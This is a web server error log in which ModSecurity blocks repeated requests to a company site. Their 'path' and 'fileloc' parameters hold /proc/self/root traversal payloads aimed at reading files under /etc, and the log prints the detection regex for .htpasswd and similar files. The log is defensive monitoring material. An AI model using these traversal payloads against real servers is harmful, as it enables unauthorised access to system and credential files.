[Mon Mar 16 14:03:00.614625 2026] [:error] [pid 11972:tid 140411540502272] [client 74.7.243.203:51382] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg3xJqj1wV0Si-Okef2DwAAABg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:03:06.398859 2026] [:error] [pid 21805:tid 140411666392832] [client 74.7.243.203:51390] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg3yrABkC4fWIHEf8H1qAAAAEk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:03:07.731145 2026] [:error] [pid 11972:tid 140411683178240] [client 74.7.243.203:51396] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg3y5qj1wV0Si-Okef2EwAAAAc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:03:09.016315 2026] [:error] [pid 21533:tid 140411565680384] [client 74.7.243.203:51402] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg3zXjZBu2q05ozVU9gLAAAAVU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:03:31.989294 2026] [:error] [pid 11972:tid 140411741927168] [client 74.7.243.203:57968] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/mime.types"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg345qj1wV0Si-Okef2KQAAAAA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:03:34.136813 2026] [:error] [pid 10831:tid 140411649607424] [client 74.7.243.203:37214] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rsyslog.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg35Y6lpbStxTqkSktzdQAAAks"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:03:35.512283 2026] [:error] [pid 21806:tid 140411641214720] [client 74.7.243.203:37228] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg359SswJuvopo3lOhl1QAAAIw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:03:36.870462 2026] [:error] [pid 11972:tid 140411691570944] [client 74.7.243.203:37234] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg36Jqj1wV0Si-Okef2LAAAAAY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:03:41.807767 2026] [:error] [pid 14895:tid 140411632822016] [client 74.7.243.203:37246] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg37VajLEzk2WiQ-10ZTQAAAo0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:03:45.374841 2026] [:error] [pid 15061:tid 140411683178240] [client 74.7.243.203:43080] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg38aTCbgAP5jq5TegyGwAAAsc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:03:47.776714 2026] [:error] [pid 10831:tid 140411674785536] [client 74.7.243.203:43086] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg3846lpbStxTqkSktzeAAAAkg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:03:49.072249 2026] [:error] [pid 10831:tid 140411548894976] [client 74.7.243.203:43094] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg39Y6lpbStxTqkSktzegAAAlc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:03:54.831279 2026] [:error] [pid 21806:tid 140411716749056] [client 74.7.243.203:44602] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg3-tSswJuvopo3lOhl4gAAAIM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:04:08.375936 2026] [:error] [pid 15568:tid 140411641214720] [client 74.7.243.203:44616] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg4CKQpVkWug9HeOt88uwAAA0w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:04:09.670982 2026] [:error] [pid 15061:tid 140411741927168] [client 74.7.243.203:52834] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg4CaTCbgAP5jq5TegyIgAAAsA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:04:13.231708 2026] [:error] [pid 15061:tid 140411582465792] [client 74.7.243.203:46654] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg4DaTCbgAP5jq5TegyJwAAAtM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:04:20.783168 2026] [:error] [pid 21805:tid 140411624429312] [client 74.7.244.31:50888] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abg4FLABkC4fWIHEf8H1uAAAAE4"]
[Mon Mar 16 14:04:54.446716 2026] [:error] [pid 10831:tid 140411632822016] [client 74.7.241.46:51860] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg4No6lpbStxTqkSktziwAAAk0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:04:57.538473 2026] [:error] [pid 21533:tid 140411641214720] [client 74.7.243.203:46664] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg4OXjZBu2q05ozVU9gYwAAAUw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:04:59.831085 2026] [:error] [pid 21806:tid 140411624429312] [client 74.7.243.203:36690] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg4O9SswJuvopo3lOhmIAAAAI4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:05:01.185573 2026] [:error] [pid 15061:tid 140411649607424] [client 74.7.243.203:56068] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg4PaTCbgAP5jq5TegyNAAAAss"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:05:02.691368 2026] [:error] [pid 14895:tid 140411607643904] [client 74.7.243.203:56074] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg4PlajLEzk2WiQ-10ZZgAAApA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
